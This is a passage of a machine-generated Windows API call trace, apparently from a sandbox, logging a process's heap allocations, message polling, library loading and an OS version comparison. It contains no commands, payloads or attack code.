[0267.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0267.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0267.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0267.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0267.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0267.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0267.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0267.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0267.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0267.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0267.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0267.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0267.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0267.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0267.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0267.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0267.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0267.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.021] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0267.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0267.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0267.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0267.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0267.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0267.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0267.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.022] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0267.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.022] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0267.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0267.022] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0267.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0267.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0267.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1758 [0267.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0267.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0267.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0267.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa60 [0267.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0267.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0267.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0267.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0267.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0267.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0267.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0267.023] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0267.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0267.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0267.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0267.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0267.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0267.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0267.024] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0267.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0267.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0267.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0267.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0267.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0267.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0267.024] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0267.024] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0267.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0267.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0267.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0267.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0267.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0267.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.025] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0267.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0267.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0267.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0267.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0267.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0267.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0267.026] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0267.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0267.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0267.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0267.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0267.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0267.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0267.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0267.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0267.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0267.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0267.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0267.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0267.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0267.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0267.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0267.027] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0267.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0267.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0267.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0267.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0267.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0267.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0267.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0267.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0267.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0267.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0267.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0267.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0267.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0267.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0267.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0267.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0267.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0267.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.028] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0267.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0267.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0267.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0267.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0267.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0267.032] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0267.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0267.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0267.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa688 [0267.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0267.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0267.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa48 [0267.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0267.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0267.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0267.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0267.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0267.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0267.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0267.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0267.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0267.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0267.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0267.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0267.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0267.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0267.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0267.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0267.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0267.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0267.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0267.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.034] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0267.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0267.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0267.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0267.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0267.035] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0267.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0267.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa358 [0267.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0267.035] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0267.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0267.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0267.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0267.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0267.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0267.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0267.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0267.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0267.036] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0267.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0267.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0267.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0267.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0267.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0267.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0267.036] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0267.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0267.036] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0267.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0267.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0267.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0267.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0267.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0267.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0267.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0267.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0267.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0267.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0267.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0267.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0267.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0267.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0267.037] RtlAllocateHeap 